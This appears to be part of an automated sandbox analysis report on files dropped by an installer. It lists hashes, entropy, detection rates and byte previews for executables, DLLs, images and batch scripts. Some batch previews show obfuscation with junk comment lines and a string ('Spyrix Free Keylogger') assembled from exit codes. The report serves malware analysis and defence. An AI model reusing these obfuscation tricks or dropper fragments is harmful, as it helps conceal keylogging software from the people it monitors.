                                                                                                                                                                                                                                                          SHA-512:5AF2BFE2166E3578D3BADA9738CD0C769B2F5A2B9E84B812C7193E3A88163B32B94EB36DE83347A8E7DC75079608102C0CF05293E647132C0F633F67AAECC446
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:timeout 6..dashboard.url
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38533120
                                                                                                                                                                                                                                                          Entropy (8bit):6.659117982180381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:393216:lw4FxslQp+QsIjKvL/RouclpOaPdvmtzzGnDHmgRBbxr5U0zvOaHxA2KZc4P9QpC:lw4fslOPKVouExr5U0zGaHxAJkuC+d7
                                                                                                                                                                                                                                                          MD5:63C6697F6F8C4DE12A18633A65A6DD50
                                                                                                                                                                                                                                                          SHA1:442715CE26B000A34E25DBE9BED05863C2488096
                                                                                                                                                                                                                                                          SHA-256:2E92C42276AEA8D407AE41B3D8B63E6C39F33EC8D1CEEB4C632B54073B56BDA3
                                                                                                                                                                                                                                                          SHA-512:50B6035BA8C2B4F871CD2CEF057A4CF21433999E6EBC2566DD92843D4F3DFFEF00198FA80F3D34424FAF049BEAFAFA637DB1FD061251A7D10FC82735E0313A92
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................&...>J.............P....@..........................P........L...@... ......................0..G........C...........................p..(...........................L-.......................................................text...h...........................`..`.rodata.L..........................`.``.rotext..............t.............. .P`.data...|U...P...V...*..............@.p..rdata...k.......k.................@..@.bss........@2.......................`..edata..G....0........2.............@.0@.idata...C.......D....A.............@.0..CRT....4....P........B.............@.0..tls.........`........B.............@.0..reloc..(....p........B.............@.0B........................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PC bitmap, Windows 3.x format, 48 x 48 x 24, resolution 2835 x 2835 px/m, cbSize 6966, bits offset 54
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):6966
                                                                                                                                                                                                                                                          Entropy (8bit):5.257630429556265
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:qJsQ8ADU7ROZX0dzdVry5xFdakbSYiq3G4wcwcOIqS:cCA5ZX4zdc5xFdakbSYiqWCjd
                                                                                                                                                                                                                                                          MD5:B83D443D2415453D2BD5BA3D64233AF0
                                                                                                                                                                                                                                                          SHA1:71D6B4D21842B2E2214CA09A82BD0301BD02796F
                                                                                                                                                                                                                                                          SHA-256:99D10B82F2BD584C5B6554514B1A747EC4DD9D8131D3B397244B3D36084D3CA1
                                                                                                                                                                                                                                                          SHA-512:C7D2A341F45CF5F858EF28341574E26D5F6C4D2F7FCB32F6A490E5F4F1DF6B6E1A7D1B82329162C46F2734EB446298741A3B82F6D961AC82C376FDF767FA0F22
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:BM6.......6...(...0...0...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j..U..O.z>.z>..P..V..m................................................................................................................c.{4..B..P..b.e.v.v.f..b..Q..C.{5..d................................................................................................K..D..`.y.................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5329
                                                                                                                                                                                                                                                          Entropy (8bit):5.379707763753434
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:nsPCuKyBy4PRWZSx84GmqUIa+zHBZclQmmUc6EYQZCh1t64R8vVIa2akG2T:xuVr5WExXG6UvUmUbrQIvtO9INakGc
                                                                                                                                                                                                                                                          MD5:CD2AC50D3746B1A9663C4D2BF7EA4D55
                                                                                                                                                                                                                                                          SHA1:909F5CFEB390B67FEFC6CD1786760FEBDBB2B875
                                                                                                                                                                                                                                                          SHA-256:F9C158AEFD53582E68F7417E6326620AE4FDE859EE6D02B263EEA838A2C6F136
                                                                                                                                                                                                                                                          SHA-512:E47073C412A92325DA84516358B43CC855B67FA6E44D092005143B35EA021B72BF8607B619F179706E3B66332A24EEB3910E1AF69076D29527C60DFF9EFF8A5F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:rem kezd4t79qxno0lbfeql5y0mu8g6iesyetjcseogfwt472kiwiubb15brfmh2wac96vhv0vnd2020j6zevgvnwwpffvshcpj0zglw700radviz4u8q9aq6k9n..@echo off..rem 000stm4gugwjkgbh428m90yr2..rem ce1k7rdsfo832vwc3jaouwf6whuhamo859077bf249yhqvmg1kd492xy1n0laxcjqawev0lgwfar618zidzyfwk96n90dum9le1hlxjvxajsku4sr3uiuy0..rem dsawc47q7b7rg3lyyyjwoquee0ll0ap5r0099bt1715bh4jezmssc1nm4xfnyr40tu10yayd38i6wla70zmf5096xpoyd018bdbpms0ennjdswzri1jyzqel..setlocal enabledelayedexpansion..rem 2e6crit365pi9pdx3kzzixkz0bxvti57alc..rem tbd2b125fv5tqy0wwb0v1woi0mnrpd6l8..rem 6g5up6bf14gd8ckrvtcxni6x4495olhkrlg706b9nszf6urghw484qcu0hf29s7vhqna1o5uloku3qzxd8591ivyo0idphj1jw9y22y0fjgsjtjodo855g0r..set iniFile=%ProgramData%\%prg_id%\temp\logger.ini..rem rrje26b6rkhrhihlujks437km32ntyjjtcvi63..rem 5qn9uxfpef8xq5039f88vk9umpfl9dj9r7apxc..rem ioq4mok81bx2zs3knaunm2b4mcsjotkyq0rwnmtauk20e7hftlruhy0eoxwbq17088ic70epr0ikd4ns0o03tu98y18pwfn2vxzg4rpi4bn3em187jjj6y1o..set getValue=0..rem 0h5hrq1blurny0ai0ueen0k8mw0cgjlrjajonp24yq2pewj7tdwn9c2e
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (382), with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44330
                                                                                                                                                                                                                                                          Entropy (8bit):5.402734283969903
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:7YLAdR2Vq+XlkbR/JrZrxvBl+EODixVDJjAn4s1QwwwSQffUVzdQWrCZvbXXMs:ULAf2Y+0N5yEOD2DtA4VBaHUVhNChLXR
                                                                                                                                                                                                                                                          MD5:9EF476730ADA792F79ECEC1A17B353DA
                                                                                                                                                                                                                                                          SHA1:1CC1EE286B1AF1612B5C841C446487C8A886FCDE
                                                                                                                                                                                                                                                          SHA-256:93C5A3C337F6377B97960E9EF502B49DBA8B74E1110FB91C87753DF9F512BCC2
                                                                                                                                                                                                                                                          SHA-512:2ADCF1A5BF4C48F37D7CA19868168D5A455A4C259E6DB05958985A5077E5E4AB86E4E3CC5B44FB07D437B1FEAB9FB27C44E2E79F234816B1B49FE2A02BA98054
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:rem gibtqhekf39mgpqap5pxyt2te17k9o7aapwwaxt2uqh9r9ulftm2bkrq1rgk6jho47nxpwejvsj5zxyatyx7v10hl8l8zdaf84vopfithjvmoz48uzg6bg2u..@echo off..rem x2bd8l07ny0pa06la0e5iujfktvb2pxkx20nj52l1zmdoo23hxvkc75pexdzdn0b48fkj0..rem maux0ukutdxt9tbb88k0q2i09t1216lj0qg09sa93u3yvhcp5l51f7aitf1chki5hkjy0c2td23wx9rl9c0y7patqsuftpcx6y0cf1..rem jcqykl0xdea3l63f01mzzek33rov71ykztdzp1wr677iyor7b9ytvp0sxzz0djpcbkrxol0lo2i86lrilpiuhyjnt0cn703qe4rj5xdw2wplwh0dxqnxwkf4..@chcp 65001..rem 90iuh7dibiwuy7yq2e2b2gy600lp47nfpilcfpieauuxvqyrwylx0n50fr2q5azxth0wgzvsbpjk2v..rem z3dfn3scjmyjo9a3frstejhv4ek1ju057o08jay6c2t2fb3ighivzzze3paxxxvd08uxu0eur0a02d8uak0m340rcn0b4fy5bhw36l3jsplk87..rem yszm15xv7y41j1jfecxaynqd0nrzl5pl0pl8sfyxf5zsc299itmk98beo4ie8buu90i7kn760wm62breujvtlwr500gratijbkx0ihkz51gpsm3rzi0p1t0b..@rem UTF-8 encoding..rem c5bsy9uclhsu8v2ionuxjz8..rem kyq0rsrtz3j0lepwuipik3cwyqc36oeagz62c0z7jp2h1ttg00c0n35tfkqiwxxijqj7cxy0q7t7b730ygponok8zdjjlkfgl6omw0pezkdoof9t..rem jnag4uwbmfqgh7y8t4uz46lf5zj18z3s00h2mdyyms
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):457728
                                                                                                                                                                                                                                                          Entropy (8bit):6.59955980299879
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:oYP3U+DowYPZOobyfwOgM2evuRTQ8r5e:3knwGZO4ZBevgTQ
                                                                                                                                                                                                                                                          MD5:5E952525D9379E001F1714DE9E87B50D
                                                                                                                                                                                                                                                          SHA1:45A1F15E62D3BEBF80BFDE69B992448DA09369FA
                                                                                                                                                                                                                                                          SHA-256:81DE9F4EE9164358163C7F2200522E5C518D649ED6868CC6F27DB2B831F42DA4
                                                                                                                                                                                                                                                          SHA-512:FCCEFD5CEFA59AAE1CCF1DF61907720BFB753AA1A6094DCB9225BA0110172103980C77708B9BB36F9D329B890ECC3F279AEE325A780308E9AC127EDC99CF8D0D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..................................... ....@..............................................................................(...0...L.......................e......................................................\............................text............................... ..`.itext.............................. ..`.data...T.... ......................@....bss.....5...@...........................idata...(.......*..................@....edata...............H..............@..@.reloc...e.......f...J..............@..B.rsrc....L...0...L..................@..@....................................@..@........................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 7 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 32 bits/pixel, -128x-128, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):110709
                                                                                                                                                                                                                                                          Entropy (8bit):3.109239298068923
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:yy+9VgmfdFYGZaAvurTUh2Asjh74zcW3X0+JaRCBiwmXtmdP:A9OmlFYGZaAG06V74QWNaRCEfwP
                                                                                                                                                                                                                                                          MD5:7E0A58E864F4BD416D0B62A8D90FEBFE
                                                                                                                                                                                                                                                          SHA1:B23CDD7F9AEBF120582C2C2C246F17E846521CF9
                                                                                                                                                                                                                                                          SHA-256:D91EB200D2E6623A83FA036C8446455B3D56067939C027AB83BF7957D6B5D5FF
                                                                                                                                                                                                                                                          SHA-512:0AE59E850429F7BA30C787B38FDAEC896710F4BD4D12F749EFB6C79AE89070CAB24182E05E54BC6E8D2EFA8C29CC420B892A1A583C9AD9A7EA446F095F5E944D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .o!..v......... .(....!..@@.... .(B...*..00.... ..%..5l.. .... .............. ............... .h........PNG........IHDR.............\r.f..!6IDATx...|U....37+.DPvd.A..(T....V[[..$lj......E._....Zm.H.bm...........Ev..YC ..y.{M.k..r33.....~.p.9..<3.....z.h....0.[H.=%E..../\6...D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,....aX.,.&..X.L.a.......`.0.....`".....D......0,.... ..e....D.y4X...@.z1..s.b&..GX.CZ9.........DN...3A.....p......a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,..`|..`....#,.K....a.X........,..GX..`.0>..........%X.....,...." . H).........,.?H(`.n`...;........ 4.....][..u.(..Z..#nXX..`...`...ye..._.TKA..0..0..D^...4.,.K...3|..F..B`..._.z..r2......Nn&C.U`.X..`....>..wt?_...K}^[....U....9..[X.X..`......_,.....s.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1274880
                                                                                                                                                                                                                                                          Entropy (8bit):6.836546460752662
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:te0Xn1+KpPCrpxqqyfATvxlLVNqRadDqef2BLbIEnp1VWMVRdzd:tJ0frxRqRIDXfuI2p1FVRdzd
                                                                                                                                                                                                                                                          MD5:D66922B7D10F688564B1CFB25B2681EC
                                                                                                                                                                                                                                                          SHA1:E97422EF6B23366FCD196DF334BD111FEBF2E880
                                                                                                                                                                                                                                                          SHA-256:E0E0697DBCD35C5C8E6E0E19C8A4186F7902D95227E8D7C0AE1C90E0E56370A1
                                                                                                                                                                                                                                                          SHA-512:5BCDB4D574E95B699EDEC336CA596C1D9446A648D27AD2B32E0D5C14F301F2EF783AE53062D9FE9E6FA956BF04A0B4F4F1B845B5194A72B2F9EAED4D9E9C0EBC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..v...v...v.......v.......v...w.>.v..=....v...v...v.....r.v.......v.......v.......v.Rich..v.........PE..L...L*.O...........!.....4...|.......].......P.......................................%.........................................x.... ..8....................0......pR..................................@............P..4............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data.......p...p...T..............@....rsrc...8.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):364544
                                                                                                                                                                                                                                                          Entropy (8bit):6.479003452408153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:fmptxuYgIrlmSqUM21IU5KWieEsdk5aKa1CZHDAO+OYb:2/uYgIrA/pU548AaKa1QxYb
                                                                                                                                                                                                                                                          MD5:D37B9AE44F3B37F41295334DE9EF14C9
                                                                                                                                                                                                                                                          SHA1:4FD95C78873CE84DDF9FFA755504F5279C4A3332
                                                                                                                                                                                                                                                          SHA-256:5BA50A315B9C02CCCD629FFBBF12A5564FD0A557FECD0582D165FE04BE3D850B
                                                                                                                                                                                                                                                          SHA-512:AF5B2D2321E81E0B407B74B4092E190A5081D248BDDF21A92A7251E5CF6C19DFDECB09E35BABA32D04C4AD7CD8659C568208B3314E37159035E1F61BE6AB387E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............m]..m]..m]...]..m]...]..m]...]..m]...]..m]B.0]..m]..l]..m]...]..m]...]..m]...]..m]Rich..m]................PE..L....:.J...........!...............................................................................................@%......T...<.......................................................................@...............8............................text............................... ..`.rdata...h.......p..................@..@.data...\B...@... ...@..............@....reloc...(.......0...`..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, xresolution=98, yresolution=106, resolutionunit=2, software=paint.net 4.0.10], baseline, precision 8, 320x240, components 3
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3095
                                                                                                                                                                                                                                                          Entropy (8bit):6.729660321273714
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:u8/Pc+/bx0uERAGX6j9UCqgD97QB2xdddddddddddddd5a:u8Hc+zlEJX6lQcW
                                                                                                                                                                                                                                                          MD5:499B10F1F3AE7CA6ACFBA3735EE75F4C
                                                                                                                                                                                                                                                          SHA1:D5CFC9E2DC00A443052765491A915A503EF9C800
                                                                                                                                                                                                                                                          SHA-256:EAF22AE8407F8DD0AC9F4FA7885A2DA8AFE288B09B2C4B87F6F17C5D50F2A988
                                                                                                                                                                                                                                                          SHA-512:F29D30CBB427598E8577606791AF3C8277391BBF1AD7964217EAF78B807A6DFC9B99846F128A5F23BE7A409A3F7DAD81F3E5FC9B2CD15C12742A98A45A7CDDB6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:......JFIF.....`.`......Exif..MM.*.................b...........j.(...........1.........rQ...........Q...........Q..................`.......`....paint.net 4.0.10.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************........@.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):402
                                                                                                                                                                                                                                                          Entropy (8bit):4.432468112054125
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:hmRBMeZSMo29ncrTMo29ncrZHbMo29ncrhMo29ncrXMo29ncrMMo29ncQXp23dUy:wbgK6fK6hbK6VK6bK6IK6CU9SL/A
                                                                                                                                                                                                                                                          MD5:498851BBE00277D04DB98A521FE760F7
                                                                                                                                                                                                                                                          SHA1:671A1E5F003A81734DCF193321F60AC0C7AB1739
                                                                                                                                                                                                                                                          SHA-256:1F5C9CB793AAC6CB8B677222C0689A955CE2A52B4022E6179AB70EB8A4261513
                                                                                                                                                                                                                                                          SHA-512:98C1DC048EDDFCB72EDA4DE75C8237FF19A4B8AFA9D31572ED608BF8018713AE4073F82F0CF838B09CE4F51746A3B17DC88619ACC7C2C6FF7453FE885059AE50
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:@echo off..set u_id=..cmd /c exit 83..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 112..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 121..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 114..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 105..set u_id=%u_id%%=exitcodeAscii%..cmd /c exit 120..set u_id=%u_id%%=exitcodeAscii%..set prg_id=%u_id% Free Keylogger..set d_id=dashboard..set p_id=https..set e_id=xe
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):364544
                                                                                                                                                                                                                                                          Entropy (8bit):6.479003452408153
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:fmptxuYgIrlmSqUM21IU5KWieEsdk5aKa1CZHDAO+OYb:2/uYgIrA/pU548AaKa1QxYb
                                                                                                                                                                                                                                                          MD5:D37B9AE44F3B37F41295334DE9EF14C9
                                                                                                                                                                                                                                                          SHA1:4FD95C78873CE84DDF9FFA755504F5279C4A3332
                                                                                                                                                                                                                                                          SHA-256:5BA50A315B9C02CCCD629FFBBF12A5564FD0A557FECD0582D165FE04BE3D850B
                                                                                                                                                                                                                                                          SHA-512:AF5B2D2321E81E0B407B74B4092E190A5081D248BDDF21A92A7251E5CF6C19DFDECB09E35BABA32D04C4AD7CD8659C568208B3314E37159035E1F61BE6AB387E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............m]..m]..m]...]..m]...]..m]...]..m]...]..m]B.0]..m]..l]..m]...]..m]...]..m]...]..m]Rich..m]................PE..L....:.J...........!...............................................................................................@%......T...<.......................................................................@...............8............................text............................... ..`.rdata...h.......p..................@..@.data...\B...@... ...@..............@....reloc...(.......0...`..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1274880
                                                                                                                                                                                                                                                          Entropy (8bit):6.836546460752662
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24576:te0Xn1+KpPCrpxqqyfATvxlLVNqRadDqef2BLbIEnp1VWMVRdzd:tJ0frxRqRIDXfuI2p1FVRdzd
                                                                                                                                                                                                                                                          MD5:D66922B7D10F688564B1CFB25B2681EC
                                                                                                                                                                                                                                                          SHA1:E97422EF6B23366FCD196DF334BD111FEBF2E880
                                                                                                                                                                                                                                                          SHA-256:E0E0697DBCD35C5C8E6E0E19C8A4186F7902D95227E8D7C0AE1C90E0E56370A1
                                                                                                                                                                                                                                                          SHA-512:5BCDB4D574E95B699EDEC336CA596C1D9446A648D27AD2B32E0D5C14F301F2EF783AE53062D9FE9E6FA956BF04A0B4F4F1B845B5194A72B2F9EAED4D9E9C0EBC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..v...v...v.......v.......v...w.>.v..=....v...v...v.....r.v.......v.......v.......v.Rich..v.........PE..L...L*.O...........!.....4...|.......].......P.......................................%.........................................x.... ..8....................0......pR..................................@............P..4............................text....2.......4.................. ..`.rdata.......P.......8..............@..@.data.......p...p...T..............@....rsrc...8.... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):21327
                                                                                                                                                                                                                                                          Entropy (8bit):4.95775402864365
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:UyK3wUGkRqqS7M2IgCEAIAiIYNwCPjuPTyySHaNM7lcomkn3J:UhgqSUdEpNw+jMTHS6eJ
                                                                                                                                                                                                                                                          MD5:C61869FD95FCAA4887007EE40C1AEF78
                                                                                                                                                                                                                                                          SHA1:5B2E9E425C48F37A3C6F2AFCFD35569BE240FB0C
                                                                                                                                                                                                                                                          SHA-256:4EBE5322D84F71C59E806B8BD29D3C53D3FDA1C82238084FBAA8852DE668E14E
                                                                                                                                                                                                                                                          SHA-512:815D5C77AF6F439D5FD3C254B6F1957537A30507D4BB40CB5ADB6FDC817D2389BD5B8D69F7AE67AF87C1F42B7A5799E0F82A0A3A0C543CFF46E72B74D867F9A8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.[LngFile]..###############################################################################..####### Attention! Do Not change the key phrases left of sign "="! ############..###############################################################################..tbStart="..."..tbStartHint="..... ......."..tbStop="...."..tbStopHint="..... ......."..tbFind="....."..tbFindHint="..... .. ....... ......."..tbSetting="........."..tbSettingHint="....... ........"..tbAbout="..."..tbAboutHint=".../...... ......."..tbHomePage="...... ........"..tbHomePageHint="...... ... ...... ........"..tbToday="....."...tbTodayHint="...... ... ... ....."..tbHide="....."..tbHideHint="..... ..... (.. .... ... .. .... ......)"..tbMinimize="....."..tbMinimizeHint="..... ... ......"..tbExit="...."..tbExitH
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52084
                                                                                                                                                                                                                                                          Entropy (8bit):5.088144154341775
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:ssSn8tDcYXyC+R+8tDcpzyA/mwMWGwI+X0IjuqhR2X4PUPgb5o69HPriWEudPiaR:sswX64zI
                                                                                                                                                                                                                                                          MD5:23F3B31CDFBD1A8A1695D3D7E4EF9B36
                                                                                                                                                                                                                                                          SHA1:A1B344F97F06F83DD818A51338B965793167F826
                                                                                                                                                                                                                                                          SHA-256:6774CCE8D38C1CE308190456560DDDC892BB4845220D08622C7D89BA79A148CB
                                                                                                                                                                                                                                                          SHA-512:145B093694165C40D4B951A2193BC573E57538D0EC6252A1C659B5258ACC327573803C31BC184196B5C0AEF372157878FFF76E7250BB2B4211BCA04A0488B3C8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff1\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1033\deflangfe1033\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 00000000000000000000}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43013
